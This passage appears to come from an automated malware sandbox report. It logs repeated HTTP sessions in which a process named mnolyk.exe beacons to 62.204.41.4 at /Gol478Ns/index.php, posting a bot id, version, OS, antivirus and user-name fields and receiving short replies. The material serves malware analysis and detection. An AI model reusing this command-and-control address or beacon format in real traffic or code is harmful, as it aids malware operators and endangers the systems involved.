                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    22192.168.2.34972462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:22.157496929 CET223OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:22.226195097 CET223INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    220192.168.2.34992262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:18.772895098 CET420OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:18.836345911 CET421INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    221192.168.2.34992362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:19.023555994 CET421OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:19.092922926 CET422INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    222192.168.2.34992462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:19.271281004 CET422OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:19.336977959 CET423INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    223192.168.2.34992562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:19.523158073 CET423OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:19.588732004 CET424INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    224192.168.2.34992662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:19.767739058 CET424OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:19.833365917 CET425INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    225192.168.2.34992762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:20.024415016 CET425OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:20.094804049 CET426INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    226192.168.2.34992862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:20.315211058 CET426OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:20.379268885 CET427INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    227192.168.2.34992962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:20.553590059 CET427OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:20.618046999 CET428INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    228192.168.2.34993062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:20.796642065 CET428OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:20.860563993 CET429INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    229192.168.2.34993162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:21.032345057 CET429OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:21.097949028 CET430INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    23192.168.2.34972562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:22.403676987 CET224OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:22.467572927 CET224INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    230192.168.2.34993262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:21.312522888 CET430OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:21.376087904 CET431INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    231192.168.2.34993362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:21.545352936 CET431OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:21.608124018 CET432INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    232192.168.2.34993462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:21.786854029 CET432OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:21.851677895 CET433INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    233192.168.2.34993562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:22.032744884 CET433OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:22.097754002 CET434INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    234192.168.2.34993662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:22.307699919 CET434OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:22.371948004 CET435INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    235192.168.2.34993762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:22.552018881 CET435OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:22.616642952 CET436INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    236192.168.2.34993862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:22.819597960 CET436OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:22.885091066 CET437INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    237192.168.2.34993962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:23.062856913 CET437OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
